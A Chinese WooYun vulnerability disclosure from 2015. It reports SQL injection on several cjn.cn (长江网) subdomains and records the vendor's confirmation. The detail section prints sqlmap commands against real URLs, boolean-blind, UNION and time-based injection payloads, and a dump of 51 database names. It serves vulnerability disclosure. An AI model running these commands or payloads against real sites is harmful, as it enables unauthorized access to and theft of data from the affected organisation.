当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163045

漏洞标题:长江网多个注入漏洞打包提交

相关厂商:长江网

漏洞作者: 心云

提交时间:2015-12-21 10:08

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-21: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

既然来乌云注册了,能不能不要老是忽略漏洞?

详细说明:

注入点1:

http://mindiao.cjn.cn/guest_more.php?boardid=81


sqlmap.py -u "http://mindiao.cjn.cn/guest_more.php?boardid=81" --dbs


[22:08:21] [INFO] GET parameter 'boardid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'boardid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: boardid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: boardid=81 AND 3729=3729
Type: UNION query
Title: Generic UNION query (NULL) - 19 columns
Payload: boardid=81 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178706b71,0x6a457477756c575161796e5077736f446474776a48484b776657526f4457514543724e63714f6848,0x71626b7071),NULL,NULL,NULL,NULL-- -
---
[22:08:32] [INFO] testing MySQL
[22:08:35] [INFO] confirming MySQL
[22:08:37] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[22:08:37] [INFO] fetching database names
available databases [51]:
[*] #mysql50#cjntj.bak
[*] #mysql50#cjnvote.bak
[*] #mysql50#phpwind.bak
[*] cc
[*] ccvms
[*] cjnphoto
[*] cjnvote
[*] collabtive
[*] dwz
[*] information_schema
[*] maps
[*] mingpai
[*] mysql
[*] myt
[*] newdata_user
[*] osfc
[*] phpstat_mysql_10_mysql
[*] phpstat_mysql_10_mysql_log
[*] phpstat_mysql_1_mysql
[*] phpstat_mysql_1_mysql_log
[*] phpstat_mysql_2_mysql
[*] phpstat_mysql_2_mysql_log
[*] phpstat_mysql_3_mysql
[*] phpstat_mysql_3_mysql_log
[*] phpstat_mysql_4_mysql
[*] phpstat_mysql_4_mysql_log
[*] phpstat_mysql_5_mysql
[*] phpstat_mysql_5_mysql_log
[*] phpstat_mysql_6_mysql
[*] phpstat_mysql_6_mysql_log
[*] phpstat_mysql_7_mysql
[*] phpstat_mysql_7_mysql_log
[*] phpstat_mysql_8_mysql
[*] phpstat_mysql_8_mysql_log
[*] phpstat_mysql_9_mysql
[*] phpstat_mysql_9_mysql_log
[*] phpstat_mysql_mysql
[*] phpstat_web
[*] phpwind
[*] phpwindcs
[*] test
[*] TriAquae
[*] tweibo
[*] veryvote
[*] vsftpduser
[*] wh4z
[*] whwx
[*] wordpress
[*] xweibo
[*] xweibo2x
[*] zhenhao


51个数据库,应该是整站的了吧
注入点2:

sqlmap.py -u "http://myt.cjn.cn/user/pf_login.php" --data "password=a&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=a" --dbs


跑出有两个数据库:

POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=-9824' OR 4782=4782#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=88952634' OR SLEEP(5)#
---
[22:24:30] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.27, PHP 5.2.17
back-end DBMS: MySQL 5.0.12
[22:24:30] [INFO] fetching database names
[22:24:30] [INFO] fetching number of databases
[22:24:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:24:30] [INFO] retrieved: 2
[22:24:47] [INFO] retrieved: informa


太慢。。。
注入点3:

sqlmap.py -u "http://t.cjn.cn/user/pf_login.php" --data "password=a&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=a" --dbs 存在POST sql注入漏洞


跑出来跟第二个注入点一样的结果 两个数据库 就不贴图了。

漏洞证明:

51个库.png

修复方案:

1.认真对待漏洞呀 既然来乌云注册了,不能老是忽略
2.漏洞不止这些 请自查

版权声明:转载请注明来源 心云@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-12-21 10:22

厂商回复:

谢谢指出漏洞

最新状态:

暂无